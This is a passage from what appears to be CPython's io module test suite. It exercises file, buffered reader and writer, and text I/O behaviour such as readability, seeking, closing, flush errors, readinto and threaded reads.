(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test consumes large resources; It takes
# a long time to build the >2 GiB file and takes >2 GiB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
with self.open(support.TESTFN, "rb") as f:
file = self.open(f.fileno(), "rb", closefd=False)
self.assertEqual(file.read()[:3], b"egg")
file.close()
self.assertRaises(ValueError, file.readinto, bytearray(1))
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2 GiB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(support.TESTFN))
check_path_succeeds(FakePath(os.fsencode(support.TESTFN)))
with self.open(support.TESTFN, "w") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(support.TESTFN), 'rwxa')
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
def test_close_assert(self):
class R(self.IOBase):
def __setattr__(self, name, value):
pass
def flush(self):
raise OSError()
f = R()
# This would cause an assertion failure.
self.assertRaises(OSError, f.close)
# Silence destructor error
R.flush = lambda self: None
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.tp(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertRegex(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertRegex(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
# Silence destructor error
raw.close = lambda: None
b.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
# Silence destructor error
b.flush = lambda: None
raw.close = lambda: None
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self) :
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
# Silence destructor error
bufio.close = lambda: None
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
def test_truncate_on_read_only(self):
rawio = self.MockFileIO(b"abc")
bufio = self.tp(rawio)
self.assertFalse(bufio.writable())
self.assertRaises(self.UnsupportedOperation, bufio.truncate)
